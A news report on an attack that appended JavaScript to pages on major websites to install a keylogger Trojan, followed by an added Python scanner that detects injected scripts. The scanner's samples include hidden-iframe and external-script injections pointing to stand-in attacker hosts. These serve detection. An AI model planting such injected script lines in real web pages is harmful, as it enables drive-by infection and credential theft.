Hackers Attack Through Popular Web Sites
Sites may be serving malicious code that steals passwords and sets up a spam relay.
James Niccolai, Paul Roberts, and Martyn Williams, IDG News Service
Internet users visiting some of the most popular sites on the Web may unwittingly be downloading malicious code that compromises their computers and sets up a relay network for a future onslaught of spam, a security services company warns.
NetSec, which provides managed security services for large businesses and government agencies, began detecting suspicious traffic on several of its customers' networks on Thursday morning, says Chief Technology Officer Brent Houlahan.
Examining firewall logs and other data points on those networks, NetSec found that when users visit certain popular Web sites--including an online auction, a search engine, and a comparison shopping site--they unwittingly download a piece of malicious JavaScript code attached to an image or graphics file on the site.
Without the user's knowledge, the code connects their PC to one of two IP addresses, one in North America and one in Russia. From those systems the PC downloads a further piece of malicious code that appears to install a keystroke logger and probably other malicious code on the computer, Houlahan says.
The code may be gathering the addresses of Web sites visited by affected users and the passwords used to access them. In addition, the IP address in Russia is a known source of spam, and the code may be creating a network of infected machines that could be used to relay spam across the Internet at some later date, he says.
Under Investigation
He stressed that NetSec is still examining the code and has yet to determine the exact payload or the intent of the attack. The SANS Institute's Internet Storm Center is also studying the outbreak and has found that the code surreptitiously downloads and installs a Trojan horse program named msits.exe, says Johannes Ullrich, the center's chief technology officer.
Ullrich did not specify what functions are performed by the msits.exe Trojan.
NetSec declines to name the affected Web sites for liability reasons but says they are "big, big sites." It is probably the Web hosting facilities that cache content for those sites that are infected, rather than the "origin servers" at the Internet service providers themselves, Houlahan says.
"The tricks used in this particular attack method are nothing new. What's significant about this is the fact that it impacts major Web hosting facilities," says Dan Frasnelli, who manages NetSec's technical assistance center.
The attack affects only users running Microsoft's Windows operating system and Internet Explorer browser, he says. It was unclear Thursday how the attack originated, but it may exploit a known vulnerability in Microsoft's IIS (Internet Information Services) Web Server software at the Web hosting facilities, Frasnelli says.
The U.S. Computer Emergency Response Team (CERT) called on system administrators running IIS version 5 to verify that there is no unusual JavaScript appended to the bottom of pages served by their systems.
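The check CERT asks for, together with the behaviour described earlier (a script appended to served pages that makes the browser fetch code from a raw IP address), can be automated. The following Python scanner is an added example written for this page, not code from NetSec, SANS or CERT. It walks a set of HTML pages (for an IIS 5 host, the document root; any web content directory works), flags every script block that sits after the closing </html> tag, and flags scripts that reference a URL whose host is a bare IPv4 address or is not on an allowlist of hosts the site legitimately loads from. The sample pages, the hostnames and the 203.0.113.7 address are constructed for the demonstration; the article does not name the real addresses.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample pages (not captured from the incident).
# A clean page: one script, loaded relatively, before </html>.
CLEAN_PAGE = """<html><head><title>Shop</title>
<script src="/js/site.js"></script></head>
<body><img src="/img/logo.gif"></body></html>
"""

# The same page with a script block appended after </html>, pulling an iframe
# from a raw IP address (203.0.113.7 is a documentation-range address, constructed here).
TAMPERED_PAGE = CLEAN_PAGE + """<script language="javascript">
var d=document;d.write('<iframe src="http://203.0.113.7/loader.php" width=0 height=0></iframe>');
</script>
"""

# A page modified inside the document rather than after it: an external script
# from a host that is not on the site's allowlist (hostname constructed).
INJECTED_HEAD_PAGE = CLEAN_PAGE.replace(
    "</head>", '<script src="http://cdn.attacker-example.net/x.js"></script></head>'
)

END_HTML_RE = re.compile(r"</html\s*>", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def find_suspicious_scripts(html, trusted_hosts=()):
    """Return a list of findings for script blocks in one HTML document.

    A block is reported if it appears after the closing </html> tag (the
    'appended JavaScript' CERT describes) or if it contains an absolute URL
    whose host is a raw IPv4 address or is absent from trusted_hosts.
    """
    trusted = {h.lower() for h in trusted_hosts}
    end = END_HTML_RE.search(html)
    end_pos = end.end() if end else len(html)  # no </html>: position check is skipped
    findings = []
    for m in SCRIPT_RE.finditer(html):
        block = m.group(0)
        reasons = []
        if m.start() >= end_pos:
            reasons.append("script appended after </html>")
        for url in URL_RE.findall(block):
            host = (urlparse(url).hostname or "").lower()
            if IPV4_RE.match(host):
                reasons.append(f"contacts raw IP {host}")
            elif host and host not in trusted:
                reasons.append(f"contacts untrusted host {host}")
        if reasons:
            findings.append({"offset": m.start(), "reasons": reasons, "snippet": block[:80]})
    return findings


def scan_directory(root, trusted_hosts=(), exts=(".htm", ".html", ".asp")):
    """Scan every file under root with a matching extension; return {path: findings}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = find_suspicious_scripts(fh.read(), trusted_hosts)
                if hits:
                    results[path] = hits
    return results


if __name__ == "__main__":
    # Hosts this (constructed) site is allowed to load script from.
    allow = ["www.example.com", "static.example.com"]
    for label, page in [("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE),
                        ("injected-head", INJECTED_HEAD_PAGE)]:
        for hit in find_suspicious_scripts(page, allow):
            print(f"{label}: offset {hit['offset']}: {'; '.join(hit['reasons'])}")
```

Run it as a script to see the two tampered samples reported, or call scan_directory against a web root to check real pages. The allowlist matters: a script whose host is the site's own CDN should not be reported, and the raw-IP rule catches the case in the article, where the injected code reached the second-stage servers by address rather than by name.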
Widespread Problem?
It was also unclear Thursday afternoon how many systems had been compromised and how widespread the problem was. NetSec says it had protected its own customers by writing custom intrusion detection signatures and blocking its customers' PCs from visiting the IP addresses involved in the attack.
"There's a potential for widespread impact because currently the [antivirus] vendors don't have a signature for it," Frasnelli says.
CERT says the attack is another example of why users must exercise caution when JavaScript is enabled on their systems, and recommends that it be disabled unless it is absolutely necessary. The group warned that even Web servers trusted by the user may be affected by this attack and may be serving malicious code.